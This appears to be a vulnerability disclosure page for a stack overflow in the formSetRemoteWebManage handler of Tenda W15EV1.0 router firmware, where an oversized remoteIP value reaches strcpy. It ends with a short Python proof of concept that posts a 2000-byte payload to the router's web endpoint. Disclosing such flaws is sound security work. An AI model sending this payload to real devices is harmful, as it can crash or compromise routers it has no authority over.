Skip to content

Latest commit

 

History

History
34 lines (21 loc) · 1.24 KB

formSetRemoteWebManage.md

File metadata and controls

34 lines (21 loc) · 1.24 KB

Overview

Affected version

W15EV1.0 V15.11.0.14

Vulnerability details

The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formSetRemoteWebManage function. The ip variable receives the remoteIP parameter from a POST request and is used in statement strcpy((char *)temp_value, (const char *)ip);, which caused the buffer overflow attack.

image-20240409130925063

image-20240409130854266

image-20240409130910804

The user-provided remoteIP can trigger this security vulnerability.

POC

import requests

IP = "192.168.84.101"
url = f"http://{IP}/goform/SetRemoteWebManage"
payload = b'a'*2000
data = {"remoteType": 1,"remoteIP": payload}
response = requests.post(url, data=data)
print(response.text)

image-20240409110959426